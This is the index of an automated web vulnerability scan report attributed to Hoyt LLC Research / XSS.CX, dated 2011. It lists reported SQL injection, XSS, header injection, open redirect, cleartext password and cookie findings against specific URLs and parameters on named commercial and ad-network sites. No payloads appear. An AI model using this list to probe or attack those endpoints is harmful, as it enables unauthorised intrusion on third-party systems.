XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05162011-02

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Mon May 16 06:37:31 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search


Loading

1. SQL injection

1.1. http://dcl.wdpromedia.com/media/dcl_v0400/Global/Promo/220x102/whyChooseDisney-Cruise.png [REST URL parameter 1]

1.2. http://dcl2.wdpromedia.com/concat/4.39.1.5/css [REST URL parameter 1]

1.3. http://dcl2.wdpromedia.com/media/dcl_v0400/Global/Promo/220x102/commerce-DVD.png [REST URL parameter 1]

1.4. http://dcl2.wdpromedia.com/media/dcl_v0400/Global/Promo/promoFreeDVD2010.jpg [REST URL parameter 1]

1.5. http://fingerhut.tt.omtrdc.net/m2/fingerhut/mbox/standard [mboxSession parameter]

1.6. http://gannett.gcion.com/addyn/3.0/5111.1/809051/0/-1/ADTECH [User-Agent HTTP header]

1.7. http://s7d5.scene7.com/is/image/bluestembrands/NC364_VA_999 [name of an arbitrarily supplied request parameter]

1.8. http://serv.adspeed.com/ad.php [name of an arbitrarily supplied request parameter]

1.9. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [widget_path parameter]

2. LDAP injection

2.1. http://dcl.wdpromedia.com/reservations/concat/2.39.0.9/css [REST URL parameter 1]

2.2. http://dcl2.wdpromedia.com/media/dcl_v0400/Site/DCLContent/Media/Assets/SpecialOffers/overview_904px.jpg [REST URL parameter 1]

3. XPath injection

4. HTTP header injection

4.1. http://ad-emea.doubleclick.net/adj/tmg.telegraph.sponsored/sponsored.travel [REST URL parameter 1]

4.2. http://ad-emea.doubleclick.net/adj/tmg.telegraph.sponsored/sponsored.travel.disney [REST URL parameter 1]

4.3. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28 [REST URL parameter 1]

4.4. http://ad.doubleclick.net/adi/N4975.1207.TRAVELOCITY.COM/B5393428.18 [REST URL parameter 1]

4.5. http://ad.doubleclick.net/adi/N5823.DbclkAdEx/B5478635.45 [REST URL parameter 1]

4.6. http://ad.doubleclick.net/adi/x1.dt/dt [REST URL parameter 1]

4.7. http://ad.doubleclick.net/adj/N5155.272756.AOL-ADVERTISING/B5116932 [REST URL parameter 1]

4.8. http://ad.doubleclick.net/adj/pmv.telegraph.tg/sponsored [REST URL parameter 1]

4.9. http://c7.zedo.com/utils/ecSet.js [v parameter]

5. Cross-site scripting (reflected)

5.1. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28 [campID parameter]

5.2. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28 [crID parameter]

5.3. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28 [partnerID parameter]

5.4. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28 [pub parameter]

5.5. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28 [pubICode parameter]

5.6. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28 [url parameter]

5.7. http://ad.turn.com/server/pixel.htm [fpid parameter]

5.8. http://ad.turn.com/server/pixel.htm [sp parameter]

5.9. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]

5.10. http://admeld.adnxs.com/usersync [admeld_callback parameter]

5.11. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

5.12. http://ahome.disney.go.com/globalelements/chrome.css [styleBackground parameter]

5.13. http://ahome.disney.go.com/globalelements/chrome.css [styleHover parameter]

5.14. http://ahome.disney.go.com/globalelements/chrome.css [styleMiddleLine parameter]

5.15. http://ahome.disney.go.com/globalelements/chrome.css [styleSelected parameter]

5.16. http://ahome.disney.go.com/globalelements/chrome.css [styleText parameter]

5.17. http://ahome.disney.go.com/globalelements/chrome.css [styleTextHover parameter]

5.18. http://ahome.disney.go.com/globalelements/chrome.css [styleTextSelected parameter]

5.19. http://choices.truste.com/ca [c parameter]

5.20. http://choices.truste.com/ca [h parameter]

5.21. http://choices.truste.com/ca [plc parameter]

5.22. http://choices.truste.com/ca [w parameter]

5.23. http://choices.truste.com/ca [zi parameter]

5.24. http://dcl.wdpromedia.com/media/dcl_v0400/Global/Promo/220x102/whyChooseDisney-Cruise.png [REST URL parameter 1]

5.25. http://dcl.wdpromedia.com/media/dcl_v0400/Site/Reservations/2.39.0.9/img/favicon.ico [REST URL parameter 1]

5.26. http://dcl.wdpromedia.com/reservations/concat/2.39.0.9/css [REST URL parameter 1]

5.27. http://dcl.wdpromedia.com/reservations/concat/2.39.0.9/js [REST URL parameter 1]

5.28. http://dcl.wdpromedia.com/services/en_US/htmlQQ/jsQuickQuote [&qqElement parameter]

5.29. http://dcl.wdpromedia.com/services/en_US/htmlQQ/jsQuickQuote [REST URL parameter 1]

5.30. http://dcl.wdpromedia.com/services/en_US/htmlQQ/jsQuickQuote [REST URL parameter 1]

5.31. http://dcl.wdpromedia.com/services/en_US/htmlQQ/jsQuickQuote [REST URL parameter 2]

5.32. http://dcl.wdpromedia.com/services/en_US/htmlQQ/jsQuickQuote [REST URL parameter 3]

5.33. http://dcl.wdpromedia.com/services/en_US/htmlQQ/jsQuickQuote [REST URL parameter 4]

5.34. http://dcl2.wdpromedia.com/concat/4.39.1.5/css [REST URL parameter 1]

5.35. http://dcl2.wdpromedia.com/concat/4.39.1.5/css [REST URL parameter 2]

5.36. http://dcl2.wdpromedia.com/concat/4.39.1.5/css [REST URL parameter 3]

5.37. http://dcl2.wdpromedia.com/media/dcl_v0400/Global/Promo/220x102/commerce-DVD.png [REST URL parameter 1]

5.38. http://dcl2.wdpromedia.com/media/dcl_v0400/Global/Promo/220x102/commerce-SpecialOffers.png [REST URL parameter 1]

5.39. http://dcl2.wdpromedia.com/media/dcl_v0400/Global/Promo/220x102/content-Videos.png [REST URL parameter 1]

5.40. http://dcl2.wdpromedia.com/media/dcl_v0400/Global/Promo/906X46/visaFinancing2.png [REST URL parameter 1]

5.41. http://dcl2.wdpromedia.com/media/dcl_v0400/Global/Promo/DCL_VisaSave40_Tile_Link.jpg [REST URL parameter 1]

5.42. http://dcl2.wdpromedia.com/media/dcl_v0400/Global/Promo/promoFreeDVD2010.jpg [REST URL parameter 1]

5.43. http://dcl2.wdpromedia.com/media/dcl_v0400/Global/globalHeader/logoDCL.png [REST URL parameter 1]

5.44. http://dcl2.wdpromedia.com/media/dcl_v0400/Site/DCLContent/Media/Assets/Home/Hero_904px_green.jpg [REST URL parameter 1]

5.45. http://dcl2.wdpromedia.com/media/dcl_v0400/Site/DCLContent/Media/Assets/SpecialOffers/overview_904px.jpg [REST URL parameter 1]

5.46. http://dcl2.wdpromedia.com/media/dcl_v0400/favicon.ico [REST URL parameter 1]

5.47. http://dcl2.wdpromedia.com/reservations/concat/2.39.0.9/css [REST URL parameter 1]

5.48. http://dcl2.wdpromedia.com/reservations/concat/2.39.0.9/js [REST URL parameter 1]

5.49. http://f.nexac.com/e/a-677/s-2140.xgi [na_kw parameter]

5.50. http://f.nexac.com/e/a-677/s-2140.xgi [na_title parameter]

5.51. http://fingerhut.tt.omtrdc.net/m2/fingerhut/mbox/standard [mbox parameter]

5.52. http://i.usatoday.net/asp/usatly/handler.ashx [longUrl parameter]

5.53. http://js.revsci.net/gateway/gw.js [csid parameter]

5.54. http://pastebin.com/favicon.ico [REST URL parameter 1]

5.55. http://pastebin.com/i/fixed.css [REST URL parameter 1]

5.56. http://pastebin.com/i/fixed.css [REST URL parameter 2]

5.57. http://pastebin.com/i/style.css [REST URL parameter 1]

5.58. http://pastebin.com/i/style.css [REST URL parameter 2]

5.59. http://pastebin.com/trends [REST URL parameter 1]

5.60. http://pastebin.com/trends [name of an arbitrarily supplied request parameter]

5.61. http://r.turn.com/server/pixel.htm [fpid parameter]

5.62. http://r.turn.com/server/pixel.htm [sp parameter]

5.63. http://s7d5.scene7.com/is/image/bluestembrands/4NL9200000010_A_999 [REST URL parameter 4]

5.64. http://s7d5.scene7.com/is/image/bluestembrands/4NP4530000010_A_999 [REST URL parameter 4]

5.65. http://s7d5.scene7.com/is/image/bluestembrands/4P2023GSG0010_VD_999 [REST URL parameter 4]

5.66. http://s7d5.scene7.com/is/image/bluestembrands/F0042_VA_999 [REST URL parameter 4]

5.67. http://s7d5.scene7.com/is/image/bluestembrands/F1900_VA_999 [REST URL parameter 4]

5.68. http://s7d5.scene7.com/is/image/bluestembrands/F1962_VB_999 [REST URL parameter 4]

5.69. http://s7d5.scene7.com/is/image/bluestembrands/F2553_WM1_400 [REST URL parameter 4]

5.70. http://s7d5.scene7.com/is/image/bluestembrands/F5676_VA_999 [REST URL parameter 4]

5.71. http://s7d5.scene7.com/is/image/bluestembrands/F6580_WM1_400 [REST URL parameter 4]

5.72. http://s7d5.scene7.com/is/image/bluestembrands/F8394_WM1_400 [REST URL parameter 4]

5.73. http://s7d5.scene7.com/is/image/bluestembrands/NA908_WM1_400 [REST URL parameter 4]

5.74. http://s7d5.scene7.com/is/image/bluestembrands/NB750_WVA_999 [REST URL parameter 4]

5.75. http://s7d5.scene7.com/is/image/bluestembrands/NC208_WM1_400 [REST URL parameter 4]

5.76. http://s7d5.scene7.com/is/image/bluestembrands/NC330_VA_999 [REST URL parameter 4]

5.77. http://s7d5.scene7.com/is/image/bluestembrands/NC364_VA_999 [REST URL parameter 4]

5.78. http://s7d5.scene7.com/is/image/bluestembrands/NC873_WM1_400 [REST URL parameter 4]

5.79. http://s7d5.scene7.com/is/image/bluestembrands/ND797_VA_999 [REST URL parameter 4]

5.80. http://s7d5.scene7.com/is/image/bluestembrands/ND877_A_999 [REST URL parameter 4]

5.81. http://s7d5.scene7.com/is/image/bluestembrands/NE440_WM1_400 [REST URL parameter 4]

5.82. http://s7d5.scene7.com/is/image/bluestembrands/NE682_WVA_999 [REST URL parameter 4]

5.83. http://s7d5.scene7.com/is/image/bluestembrands/NE967_WM1_400 [REST URL parameter 4]

5.84. http://s7d5.scene7.com/is/image/bluestembrands/NH642_VA_999 [REST URL parameter 4]

5.85. http://s7d5.scene7.com/is/image/bluestembrands/NI736_WVA_999 [REST URL parameter 4]

5.86. http://s7d5.scene7.com/is/image/bluestembrands/NJ310_WM1_400 [REST URL parameter 4]

5.87. http://s7d5.scene7.com/is/image/bluestembrands/NJ484_WVA_999 [REST URL parameter 4]

5.88. http://s7d5.scene7.com/is/image/bluestembrands/NJ847_VA_999 [REST URL parameter 4]

5.89. http://s7d5.scene7.com/is/image/bluestembrands/NK248_VC_999 [REST URL parameter 4]

5.90. http://s7d5.scene7.com/is/image/bluestembrands/NL522_A_999 [REST URL parameter 4]

5.91. http://s7d5.scene7.com/is/image/bluestembrands/NL578_WVA_999 [REST URL parameter 4]

5.92. http://s7d5.scene7.com/is/image/bluestembrands/NM486_VC_999 [REST URL parameter 4]

5.93. http://s7d5.scene7.com/is/image/bluestembrands/NQ086_VA_999 [REST URL parameter 4]

5.94. http://s7d5.scene7.com/is/image/bluestembrands/NQ087_VA_999 [REST URL parameter 4]

5.95. http://s7d5.scene7.com/is/image/bluestembrands/NQ582_WVA_999 [REST URL parameter 4]

5.96. http://s7d5.scene7.com/is/image/bluestembrands/NR042_WVA_999 [REST URL parameter 4]

5.97. http://s7d5.scene7.com/is/image/bluestembrands/NR149_WVA_999 [REST URL parameter 4]

5.98. http://s7d5.scene7.com/is/image/bluestembrands/NS372_WVA_999 [REST URL parameter 4]

5.99. http://s7d5.scene7.com/is/image/bluestembrands/h6381_400 [REST URL parameter 4]

5.100. http://s7d5.scene7.com/is/image/bluestembrands/j7804_400 [REST URL parameter 4]

5.101. http://s7d5.scene7.com/is/image/bluestembrands/n4728_400 [REST URL parameter 4]

5.102. http://sales.liveperson.net/hc/71737897/ [msessionkey parameter]

5.103. http://serv.adspeed.com/ad.php [ht parameter]

5.104. http://serv.adspeed.com/ad.php [wd parameter]

5.105. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [cb parameter]

5.106. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [plckcommentonkey parameter]

5.107. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [plckcommentonkeytype parameter]

5.108. http://sony.links.channelintelligence.com/pages/prices.asp [ssku parameter]

5.109. http://sony.tt.omtrdc.net/m2/sony/mbox/ajax [mbox parameter]

5.110. http://sonycomputerentertai.tt.omtrdc.net/m2/sonycomputerentertai/mbox/standard [mbox parameter]

5.111. http://sonycomputerentertai.tt.omtrdc.net/m2/sonycomputerentertai/sc/standard [mbox parameter]

5.112. http://sonycomputerentertai.tt.omtrdc.net/m2/sonycomputerentertai/sc/standard [mboxId parameter]

5.113. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]

5.114. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]

5.115. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]

5.116. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]

5.117. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]

5.118. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]

5.119. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]

5.120. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]

5.121. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]

5.122. http://wow.weather.com/weather/wow/module/USNY0400 [config parameter]

5.123. http://wow.weather.com/weather/wow/module/USNY0400 [target parameter]

5.124. https://www.sonystyle.com/webapp/wcs/stores/servlet/LogonForm [Referer HTTP header]

5.125. http://f.nexac.com/e/a-677/s-2140.xgi [na_id cookie]

5.126. http://optimized-by.rubiconproject.com/a/dk.js [ruid cookie]

6. Flash cross-domain policy

6.1. http://0.gravatar.com/crossdomain.xml

6.2. http://6e8d64.r.axf8.net/crossdomain.xml

6.3. http://a.tribalfusion.com/crossdomain.xml

6.4. http://ad-emea.doubleclick.net/crossdomain.xml

6.5. http://ad.doubleclick.net/crossdomain.xml

6.6. http://ad.turn.com/crossdomain.xml

6.7. http://admeld.adnxs.com/crossdomain.xml

6.8. http://ahome.disney.go.com/crossdomain.xml

6.9. http://ajax.googleapis.com/crossdomain.xml

6.10. http://aperture.displaymarketplace.com/crossdomain.xml

6.11. http://api.ak.facebook.com/crossdomain.xml

6.12. http://b.scorecardresearch.com/crossdomain.xml

6.13. http://bh.contextweb.com/crossdomain.xml

6.14. http://c7.zedo.com/crossdomain.xml

6.15. http://cdn.gigya.com/crossdomain.xml

6.16. http://cdn.turn.com/crossdomain.xml

6.17. http://cdn5.tribalfusion.com/crossdomain.xml

6.18. http://ctix8.cheaptickets.com/crossdomain.xml

6.19. http://d.xp1.ru4.com/crossdomain.xml

6.20. http://dar.youknowbest.com/crossdomain.xml

6.21. http://feeds.delicious.com/crossdomain.xml

6.22. http://fingerhut.tt.omtrdc.net/crossdomain.xml

6.23. http://fls.doubleclick.net/crossdomain.xml

6.24. http://gannett.gcion.com/crossdomain.xml

6.25. http://gscounters.gigya.com/crossdomain.xml

6.26. http://i.w55c.net/crossdomain.xml

6.27. http://ib.adnxs.com/crossdomain.xml

6.28. http://idcs.interclick.com/crossdomain.xml

6.29. http://js.revsci.net/crossdomain.xml

6.30. http://metrics.fingerhut.com/crossdomain.xml

6.31. http://metrics.mcafee.com/crossdomain.xml

6.32. http://metrics.sonystyle.com/crossdomain.xml

6.33. http://metrics.us.playstation.com/crossdomain.xml

6.34. http://nexus2.ensighten.com/crossdomain.xml

6.35. http://p.brilig.com/crossdomain.xml

6.36. http://pix04.revsci.net/crossdomain.xml

6.37. http://pixel.33across.com/crossdomain.xml

6.38. http://pixel.invitemedia.com/crossdomain.xml

6.39. http://r.turn.com/crossdomain.xml

6.40. http://secure-us.imrworldwide.com/crossdomain.xml

6.41. http://serv.adspeed.com/crossdomain.xml

6.42. http://sony.links.channelintelligence.com/crossdomain.xml

6.43. http://sony.links.origin.channelintelligence.com/crossdomain.xml

6.44. http://sony.tcliveus.com/crossdomain.xml

6.45. http://sony.tt.omtrdc.net/crossdomain.xml

6.46. http://sonycomputerentertai.tt.omtrdc.net/crossdomain.xml

6.47. http://sync.mathtag.com/crossdomain.xml

6.48. http://t.invitemedia.com/crossdomain.xml

6.49. http://tags.bluekai.com/crossdomain.xml

6.50. http://ttwbs.channelintelligence.com/crossdomain.xml

6.51. http://turn.nexac.com/crossdomain.xml

6.52. http://usatoday1.112.2o7.net/crossdomain.xml

6.53. http://w88.go.com/crossdomain.xml

6.54. http://webtrends.telegraph.co.uk/crossdomain.xml

6.55. http://www.viddler.com/crossdomain.xml

6.56. http://adadvisor.net/crossdomain.xml

6.57. http://api.tweetmeme.com/crossdomain.xml

6.58. http://content.usatoday.com/crossdomain.xml

6.59. http://contextweb.usatoday.net/crossdomain.xml

6.60. http://cookex.amp.yahoo.com/crossdomain.xml

6.61. http://dcl.wdpromedia.com/crossdomain.xml

6.62. http://dcl2.wdpromedia.com/crossdomain.xml

6.63. http://disneycruise.disney.go.com/crossdomain.xml

6.64. http://feeds.bbci.co.uk/crossdomain.xml

6.65. http://googleads.g.doubleclick.net/crossdomain.xml

6.66. http://i.usatoday.net/crossdomain.xml

6.67. http://images.scanalert.com/crossdomain.xml

6.68. http://imawow.weather.com/crossdomain.xml

6.69. http://login.dotomi.com/crossdomain.xml

6.70. http://newsrss.bbc.co.uk/crossdomain.xml

6.71. http://optimized-by.rubiconproject.com/crossdomain.xml

6.72. http://pagead2.googlesyndication.com/crossdomain.xml

6.73. http://pubads.g.doubleclick.net/crossdomain.xml

6.74. http://s7d5.scene7.com/crossdomain.xml

6.75. http://static.ak.fbcdn.net/crossdomain.xml

6.76. http://travel.travelocity.com/crossdomain.xml

6.77. http://travel.usatoday.com/crossdomain.xml

6.78. http://webassets.scea.com/crossdomain.xml

6.79. http://wow.weather.com/crossdomain.xml

6.80. http://www.facebook.com/crossdomain.xml

6.81. http://www.fingerhut.com/crossdomain.xml

6.82. https://www.fingerhut.com/crossdomain.xml

6.83. http://www.mcafeesecure.com/crossdomain.xml

6.84. https://www.mcafeesecure.com/crossdomain.xml

6.85. http://www.telegraph.co.uk/crossdomain.xml

6.86. http://www.orbitz.com/crossdomain.xml

7. Silverlight cross-domain policy

7.1. http://ad-emea.doubleclick.net/clientaccesspolicy.xml

7.2. http://ad.doubleclick.net/clientaccesspolicy.xml

7.3. http://b.scorecardresearch.com/clientaccesspolicy.xml

7.4. http://content.usatoday.com/clientaccesspolicy.xml

7.5. http://contextweb.usatoday.net/clientaccesspolicy.xml

7.6. http://i.usatoday.net/clientaccesspolicy.xml

7.7. http://metrics.fingerhut.com/clientaccesspolicy.xml

7.8. http://metrics.mcafee.com/clientaccesspolicy.xml

7.9. http://metrics.sonystyle.com/clientaccesspolicy.xml

7.10. http://metrics.us.playstation.com/clientaccesspolicy.xml

7.11. http://pixel.33across.com/clientaccesspolicy.xml

7.12. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

7.13. http://usatoday1.112.2o7.net/clientaccesspolicy.xml

7.14. http://w88.go.com/clientaccesspolicy.xml

8. Cleartext submission of password

8.1. http://disneycruise.disney.go.com/reservations/customize

8.2. http://localhost:50386/hoyt/Sitefinity/Startup

8.3. http://shoprunner.force.com/content/JsContentElementsGNC

8.4. http://shoprunner.force.com/content/JsContentElementsPET

8.5. http://www.passporterboards.com/forums/

8.6. http://www.viddler.com/file/7d63c65a/html5mobile/

9. XML injection

9.1. http://api.ak.facebook.com/restserver.php [format parameter]

9.2. http://d1nh2vjpqpfnin.cloudfront.net/main/prod/utag.7001.js [REST URL parameter 1]

9.3. http://d1nh2vjpqpfnin.cloudfront.net/main/prod/utag.7001.js [REST URL parameter 2]

9.4. http://d1nh2vjpqpfnin.cloudfront.net/main/prod/utag.7001.js [REST URL parameter 3]

9.5. http://f.nexac.com/e/a-677/s-2140.xgi [REST URL parameter 1]

9.6. http://f.nexac.com/e/a-677/s-2140.xgi [REST URL parameter 2]

9.7. http://f.nexac.com/e/a-677/s-2140.xgi [REST URL parameter 3]

9.8. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 1]

9.9. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 2]

9.10. http://platform1.twitter.com/widgets/tweet_button.html [REST URL parameter 1]

9.11. http://platform1.twitter.com/widgets/tweet_button.html [REST URL parameter 2]

9.12. http://r.nexac.com/e/getdata.xgi [REST URL parameter 1]

9.13. http://r.nexac.com/e/getdata.xgi [REST URL parameter 2]

10. SQL statement in request parameter

10.1. https://store.playstation.com/external/index.vm

10.2. http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay

11. Session token in URL

11.1. http://fingerhut.tt.omtrdc.net/m2/fingerhut/mbox/standard

11.2. http://mbox12.offermatica.com/m2/guitarcenter/mbox/standard

11.3. http://sales.liveperson.net/hc/71737897/

11.4. http://sony.tt.omtrdc.net/m2/sony/mbox/ajax

11.5. http://sonycomputerentertai.tt.omtrdc.net/m2/sonycomputerentertai/mbox/standard

11.6. http://sonycomputerentertai.tt.omtrdc.net/m2/sonycomputerentertai/sc/standard

12. SSL certificate

12.1. https://www.mcafeesecure.com/

12.2. https://store.playstation.com/

12.3. https://www.fingerhut.com/

12.4. https://www.sonystyle.com/

13. Password field submitted using GET method

13.1. http://shoprunner.force.com/content/JsContentElementsGNC

13.2. http://shoprunner.force.com/content/JsContentElementsPET

14. Open redirection

14.1. http://0.gravatar.com/avatar/4c44589c9d078af70f5c8c1c46945e93 [d parameter]

14.2. http://0.gravatar.com/avatar/6a69081c59ca58f4bb6f7a15970aa073 [d parameter]

14.3. http://ad.doubleclick.net/click%3Bh%3Dv8/3b09/f/8c/%2a/j%3B232796950%3B0-0%3B0%3B56677086%3B3454-728/90%3B38609320/38627077/1%3Bu%3D17918465%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick [REST URL parameter 10]

14.4. http://b.scorecardresearch.com/r [d.c parameter]

14.5. http://bh.contextweb.com/bh/rtset [rurl parameter]

14.6. http://i.w55c.net/ping_match.gif [rurl parameter]

14.7. http://p.brilig.com/contact/bct [REDIR parameter]

14.8. http://pixel.invitemedia.com/pubmatic_sync [pubmatic_callback parameter]

14.9. http://r.nexac.com/e/getdata.xgi [ru parameter]

14.10. http://s.ixiaa.com/digi/9D763773-52FA-4D45-8966-C91EFF22B643/a.gif [&redirect parameter]

14.11. http://sync.mathtag.com/sync/img [redir parameter]

15. Cookie scoped to parent domain

15.1. http://eval.bizrate.com/js/survey_126457_1.js

15.2. http://sony.links.origin.channelintelligence.com/pages/wl.asp

15.3. http://ttwbs.channelintelligence.com/

15.4. http://www.popularmedia.net/widget/2be74c3e1d1bba1022bc80b0b5e0e0a5

15.5. http://a.tribalfusion.com/j.ad

15.6. http://action.media6degrees.com/orbserv/hbpix

15.7. http://ad.turn.com/server/ads.js

15.8. http://ad.turn.com/server/pixel.htm

15.9. http://admeld.adnxs.com/usersync

15.10. http://ads.revsci.net/adserver/ako

15.11. http://adserver.veruta.com/track.fcgi

15.12. http://ak1.abmr.net/is/images3.pacsun.com

15.13. http://ak1.abmr.net/is/tag.admeld.com

15.14. http://ak1.abmr.net/is/tag.contextweb.com

15.15. http://ak1.abmr.net/is/www.imiclk.com

15.16. http://analytics.apnewsregistry.com/analytics/v2/image.svc/NYDUN/RWS/observertoday.com/MAI/559280/E/prod/PC/Basic/AT/A

15.17. http://b.scorecardresearch.com/b

15.18. http://b.scorecardresearch.com/r

15.19. http://bh.contextweb.com/bh/rtset

15.20. http://c7.zedo.com/utils/ecSet.js

15.21. http://cw-m.d.chango.com/m/cw

15.22. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/4325897289836481830

15.23. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/4325897289836481830

15.24. http://d.audienceiq.com/r/du/id/L2NzaWQvNS9leHRwaWQvNA/extuid/0

15.25. http://d.mediabrandsww.com/r/dm/mkt/3/mpid//mpuid/4325897289836481830

15.26. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4325897289836481830

15.27. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4325897289836481830/mchpid/9/url/

15.28. http://d.turn.com/r/dd/id/L2NzaWQvMS9jaWQvMzMxMDg2My90LzI/cat/,/id/L2NzaWQvMS9jaWQvMzMxMTIxNy90LzI/cat/000

15.29. http://data.adsrvr.org/map/cookie/contextweb

15.30. http://disneycruise.disney.go.com/reservations/customize

15.31. http://f.nexac.com/e/a-677/s-2140.xgi

15.32. http://https.edge.ru4.com/smartserve/ad

15.33. http://i.w55c.net/ping_match.gif

15.34. http://ib.adnxs.com/getuid

15.35. http://ib.adnxs.com/getuidnb

15.36. http://ib.adnxs.com/seg

15.37. http://id.google.com/verify/EAAAAI5KErmDGgY20W4qgKYVOXI.gif

15.38. http://id.google.com/verify/EAAAAI5WmUe7AMUDtVWgnHpi9vs.gif

15.39. http://id.google.com/verify/EAAAAK1jLqbLr1uikXFW8U9zAtc.gif

15.40. http://idcs.interclick.com/Segment.aspx

15.41. http://idpix.media6degrees.com/orbserv/hbpix

15.42. http://image2.pubmatic.com/AdServer/Pug

15.43. http://js.revsci.net/gateway/gw.js

15.44. http://leadback.advertising.com/adcedge/lb

15.45. http://media.fastclick.net/w/tre

15.46. http://odb.outbrain.com/utils/get

15.47. http://odb.outbrain.com/utils/ping.html

15.48. http://optimized-by.rubiconproject.com/a/dk.js

15.49. http://p.brilig.com/contact/bct

15.50. http://pix04.revsci.net/D08734/a1/0/0/0.gif

15.51. http://pix04.revsci.net/E06560/b3/0/3/0902121/179920729.js

15.52. http://pix04.revsci.net/E06560/b3/0/3/0902121/480772802.js

15.53. http://pix04.revsci.net/J06575/a4/0/0/pcx.js

15.54. http://pix04.revsci.net/J06575/b3/0/3/1003161/817295946.js

15.55. http://pixel.33across.com/ps/

15.56. http://pixel.invitemedia.com/data_sync

15.57. http://pixel.mathtag.com/event/img

15.58. http://pixel.quantserve.com/pixel

15.59. http://pixel.rubiconproject.com/tap.php

15.60. http://pixel.rubiconproject.com/tap.php

15.61. http://r.openx.net/set

15.62. http://r.turn.com/r/bd

15.63. http://r.turn.com/r/beacon

15.64. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC85/rnd/iqAJF

15.65. http://r.turn.com/server/pixel.htm

15.66. http://r1-ads.ace.advertising.com/site=786652/size=728090/u=2/bnum=71920917/hr=20/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Ftravel.usatoday.com%252Fcruises%252Fpost%252F2011%252F05%252Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%252F169725%252F1

15.67. http://segment-pixel.invitemedia.com/pixel

15.68. http://sitelife.usatoday.com/ver1.0/Stats/Tracker.gif

15.69. http://sitelife.usatoday.com/ver1.0/USAT/pluck/comments/comments.css

15.70. http://sitelife.usatoday.com/ver1.0/USAT/pluck/pluck.css

15.71. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app

15.72. http://sitelife.usatoday.com/ver1.0/usat/pluck/comments/comments.js

15.73. http://sitelife.usatoday.com/ver1.0/usat/pluck/pluck.js

15.74. http://sync.mathtag.com/sync/img

15.75. http://t.invitemedia.com/track_imp

15.76. http://tag.contextweb.com/TagPublish/getad.aspx

15.77. http://tags.bluekai.com/site/2948

15.78. http://tags.bluekai.com/site/3358

15.79. http://www.imiclk.com/cgi/r.cgi

15.80. http://www.mcafeesecure.com/ads/1002/25

15.81. http://www.passporterboards.com/forums/

16. Cookie without HttpOnly flag set

16.1. http://disneycruise.disney.go.com/reservations/customize

16.2. http://eval.bizrate.com/js/survey_126457_1.js

16.3. http://ots.optimize.webtrends.com/ots/ots/js-3.0/90335/317ef0c53ce434d79761760b1d40347dce1dade30efce8abb9cea602dae5fab7b06f4e93bb3f667a07ee563cf7bc2d4232f06bb7f9551780b68f113eb9a117f9a8f5e92ac06d40757c1f327af58842cd4ede645d42893c1cf7567b7c149eccb35356fa98e2ffc3ea1f7e23859254a9bc687cbd012c1294d6dd5fa4663a918ff41c437a0301317f373b3c0992b6d96981bda65e1d1fe4c47301325b8ca01bf7ba47ae225e2a2f2e826ec46b03e5fe8b034e8401cc58a67b3ef660684ba53727e6b4a59cf85b09fac363756abce482b7010a01a64b1139be6bc27a0107ea3fafa6bc66290a5e4901c66449407eaead3c062013e948ce98836c6ae4f48bc0a677d48de9109ba9f81c0adda9668dcf3868ac5307153b025338ebe5b5422ea4af743d0141749c639ad70ccbd31237c2a742c40719df3207ef5dd54f702632f58045b6e44bcca9d6a9060b2ca294a1c6c3e821c27f51b4679ad80bd6619d689e737f8aad5a15363b2761f8586e4ce4695ee1944d4695e2fdbad38ff824a43cc131fd452fce2a70a89ee5a7811f32ef0c544ac6f3b9c4bdbb09c0480bbc0cdeaa5da019ab9355b6b76f9f766b060164eb11

